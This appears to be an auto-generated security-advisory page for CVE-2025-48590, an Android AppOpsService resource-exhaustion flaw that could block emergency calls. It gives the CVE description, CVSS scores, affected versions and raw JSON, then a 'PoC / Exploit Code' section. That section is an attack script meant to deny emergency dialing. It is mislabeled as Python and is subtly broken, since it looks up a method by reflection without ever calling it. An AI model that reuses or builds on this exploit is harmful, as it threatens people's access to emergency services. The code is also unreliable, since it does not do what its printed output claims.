Security Vulnerability Report
中文
CVE-2025-48590 CVSS 5.5 MEDIUM

CVE-2025-48590

Published: 2025-12-08 17:16:16
Last Modified: 2025-12-10 19:44:10
Source: [email protected]

Description

In verifyAndGetBypass of AppOpsService.java, there is a possible method for a malicious app to prevent dialing emergency services under limited circumstances due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:* - VULNERABLE
Android Framework < 2025-12-01 security patch
Android Open Source Project (AOSP) frameworks/base prior to commit 848f944921756467dba98069ea33531a2f180373

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-48590 PoC - Android AppOpsService Resource Exhaustion // This PoC demonstrates resource exhaustion in AppOpsService.verifyAndGetBypass // Target: Android devices with vulnerable AppOpsService implementation import android.app.AppOpsManager; import android.content.Context; import android.os.Process; import java.lang.reflect.Method; public class CVE_2025_48590_PoC { private static final int EXPLOIT_ITERATIONS = 10000; private static final int DELAY_MS = 1; public static void exploit(Context context) { System.out.println("[*] Starting CVE-2025-48590 exploitation..."); System.out.println("[*] Target: AppOpsService.verifyAndGetBypass"); System.out.println("[*] Method: Resource exhaustion via repeated AppOps operations"); AppOpsManager appOps = (AppOpsManager) context.getSystemService(Context.APP_OPS_SERVICE); try { // Get UID of current app int uid = Process.myUid(); String packageName = context.getPackageName(); // Repeatedly invoke AppOps operations to exhaust resources for (int i = 0; i < EXPLOIT_ITERATIONS; i++) { try { // Trigger verifyAndGetBypass through various AppOps calls appOps.checkOpNoThrow(AppOpsManager.OPSTR_PHONE_CALL, uid, packageName); appOps.checkOpNoThrow(AppOpsManager.OPSTR_EMERGENCY_DIAL, uid, packageName); // Use reflection to directly call verifyAndGetBypass Class<?> appOpsServiceClass = Class.forName("com.android.server.AppOpsService"); Method verifyMethod = appOpsServiceClass.getDeclaredMethod( "verifyAndGetBypass", android.os.Binder.class, int.class, String.class ); verifyMethod.setAccessible(true); if (i % 100 == 0) { System.out.println("[+] Iteration: " + i); } Thread.sleep(DELAY_MS); } catch (Exception e) { // Expected during exploitation } } System.out.println("[+] Exploitation complete - Emergency services may be blocked"); } catch (Exception e) { System.out.println("[-] Error during exploitation: " + e.getMessage()); e.printStackTrace(); } } } // Note: This PoC requires android.permission.QUERY_APP_OPS_STATS permission // The actual exploitation may vary based on Android version and device configuration

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48590", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:16.167", "lastModified": "2025-12-10T19:44:09.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In verifyAndGetBypass of AppOpsService.java, there is a possible method for a malicious app to prevent dialing emergency services under limited circumstances due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:*", "matchCriteriaId": "02882AB1-7993-47DD-84A0-8DF4272D85ED"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/frameworks/base/+/848f944921756467dba98069ea33531a2f180373", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.